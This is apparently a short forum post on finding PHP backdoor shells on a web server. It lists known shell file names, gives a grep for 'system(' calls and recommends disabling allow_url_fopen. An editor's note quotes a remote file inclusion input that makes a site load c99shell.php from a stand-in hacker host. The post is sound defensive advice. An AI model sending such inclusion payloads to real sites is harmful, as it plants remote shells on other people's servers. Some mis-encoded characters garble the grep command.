detecting php backdoors

c99shell.php
r57shell.php
php_shell.php
myshell.php
php_backdoor.php

These are the common PHP backdoors that are being use today by script kiddies. And to detect them is simple. First go to your web directory (ex. /var/www/web/) because PHP backdoors are located in web directory to be use by script kiddies later to access your system remotely. In console just type this:

root@server /var/www:~# grep ā..n ā..r 'system(' *

Most backdoors uses a system() function to execute a command.

But sometimes if your whole system is already rooted then ā..grepā.. command is useless because it is already change by another ā..grepā.. binary that comes from the rootkit.

view the example below

c99shell.php

Editors Note:
Remember, it's not neccessary for the file to actually be on your server, just that your server run the file. Many kiddies will try to use your existing website to load their php shell script. Such as when you see a website that uses "domain.com?page=home" (where domain.com is your website on your server), many kiddies will try to load "domain.com?page=http:hackersite.php/c99shell.php" to get your server to load their php shell remotely. Other than good coding (don't accept blind input, clean and scrub all user input, selecting from switch statements, etc..) you can (and always should) set this line in your php.ini file:

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = Off

If you turn that Off, that prevents them from loading remote files. Unfortunately that setting defaults to On in most Linux distros. Also, just how reans shows you to grep your web dirs, you can use that to grep your apache log files.
-alex